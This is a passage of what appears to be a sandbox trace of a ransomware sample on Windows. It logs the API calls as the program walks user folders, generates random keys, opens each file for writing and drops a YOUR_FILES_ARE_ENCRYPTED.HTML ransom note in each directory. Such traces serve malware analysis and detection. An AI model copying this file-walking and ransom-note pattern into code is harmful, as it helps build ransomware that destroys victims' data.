(lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) 
returned 0x600 [0171.328] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.328] CloseHandle (hObject=0x600) returned 1 [0171.328] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc982040, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc982040, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0171.328] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0171.328] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.328] PathFindExtensionW (pszPath="Windows Live Gallery.url") returned=".url" [0171.328] lstrlenW (lpString=".url") returned 4 [0171.328] PathFindExtensionW (pszPath="Windows Live Gallery.url") returned=".url" [0171.328] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.329] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.329] CloseHandle (hObject=0x600) returned 1 [0171.329] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3cc5d2, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0171.329] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0171.329] lstrcmpW (lpString1="Windows Live Mail.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.329] PathFindExtensionW (pszPath="Windows Live Mail.url") returned=".url" [0171.329] lstrlenW (lpString=".url") returned 4 [0171.329] PathFindExtensionW (pszPath="Windows Live Mail.url") returned=".url" [0171.329] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.329] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.329] CloseHandle (hObject=0x600) returned 1 [0171.330] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a418892, ftLastWriteTime.dwHighDateTime=0x1cb88f5, 
nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0171.330] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0171.330] lstrcmpW (lpString1="Windows Live Spaces.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.330] PathFindExtensionW (pszPath="Windows Live Spaces.url") returned=".url" [0171.330] lstrlenW (lpString=".url") returned 4 [0171.330] PathFindExtensionW (pszPath="Windows Live Spaces.url") returned=".url" [0171.330] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.330] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.330] CloseHandle (hObject=0x600) returned 1 [0171.330] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a418892, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0171.330] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.330] wnsprintfW (in: pszDest=0x7690008, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0171.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\favorites\\windows live\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.331] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.333] CloseHandle (hObject=0x5f8) returned 1 [0171.333] GetProcessHeap () returned 0x270000 [0171.334] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.334] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0171.334] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.334] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 60 [0171.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\favorites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.335] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.337] CloseHandle (hObject=0x5a0) returned 1 [0171.337] GetProcessHeap () returned 0x270000 [0171.338] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.338] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xad734f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad734f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Links", cAlternateFileName="")) returned 1 [0171.338] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links") returned 26 [0171.338] GetProcessHeap () returned 0x270000 [0171.338] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.338] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Links" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links") returned="\\\\?\\C:\\Users\\Default\\Links" [0171.338] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*") returned="\\\\?\\C:\\Users\\Default\\Links\\*" [0171.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, 
ftLastAccessTime.dwLowDateTime=0xad734f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad734f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xad734f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad734f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb50332b0, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.343] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0171.343] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.343] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.343] lstrlenW (lpString=".ini") returned 4 [0171.343] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc2f900, 
ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb500d150, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0171.343] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0171.343] lstrcmpW (lpString1="Desktop.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.343] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0171.343] lstrlenW (lpString=".lnk") returned 4 [0171.343] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0171.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca8c9e0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca8c9e0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb50332b0, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x36e, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0171.343] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0171.343] lstrcmpW (lpString1="Downloads.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.343] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0171.343] lstrlenW (lpString=".lnk") returned 4 [0171.343] PathFindExtensionW (pszPath="Downloads.lnk") returned=".lnk" [0171.343] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad734f30, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad734f30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad734f30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x762, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0171.343] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\OneDrive.lnk") returned 39 [0171.343] lstrcmpW (lpString1="OneDrive.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.344] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0171.344] lstrlenW (lpString=".lnk") returned 4 [0171.344] PathFindExtensionW (pszPath="OneDrive.lnk") returned=".lnk" [0171.344] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc2f900, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb500d150, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0171.344] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\RecentPlaces.lnk") returned 43 [0171.344] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.344] PathFindExtensionW (pszPath="RecentPlaces.lnk") returned=".lnk" [0171.344] lstrlenW (lpString=".lnk") returned 4 [0171.344] PathFindExtensionW (pszPath="RecentPlaces.lnk") returned=".lnk" [0171.344] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc2f900, 
ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb500d150, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0171.344] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.345] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 56 [0171.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\links\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.348] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.350] CloseHandle (hObject=0x5a0) returned 1 [0171.351] GetProcessHeap () returned 0x270000 [0171.351] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.351] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0171.351] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings") returned 35 [0171.351] GetProcessHeap () returned 0x270000 [0171.351] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.351] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Local Settings" | out: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings") returned="\\\\?\\C:\\Users\\Default\\Local Settings" [0171.351] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings\\*") returned="\\\\?\\C:\\Users\\Default\\Local Settings\\*" [0171.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcc2f900, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb500d150, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RecentPlaces.lnk", cAlternateFileName="ꀈݎ")) returned 0xffffffff [0171.352] GetProcessHeap () returned 0x270000 [0171.352] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.352] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Music", cAlternateFileName="")) returned 1 [0171.352] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\Music") returned 26 [0171.352] GetProcessHeap () returned 0x270000 [0171.352] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.352] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music") returned="\\\\?\\C:\\Users\\Default\\Music" [0171.352] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\*") returned="\\\\?\\C:\\Users\\Default\\Music\\*" [0171.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.353] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.353] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4edc64e, 
ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.353] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0171.353] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.353] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.353] lstrlenW (lpString=".ini") returned 4 [0171.353] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.353] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.353] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.353] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 56 [0171.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\music\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.354] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.356] 
CloseHandle (hObject=0x5a0) returned 1 [0171.356] GetProcessHeap () returned 0x270000 [0171.357] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.357] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175548fb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175548fb, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175548fb, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0171.357] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents") returned 33 [0171.357] GetProcessHeap () returned 0x270000 [0171.357] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.357] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\My Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\My 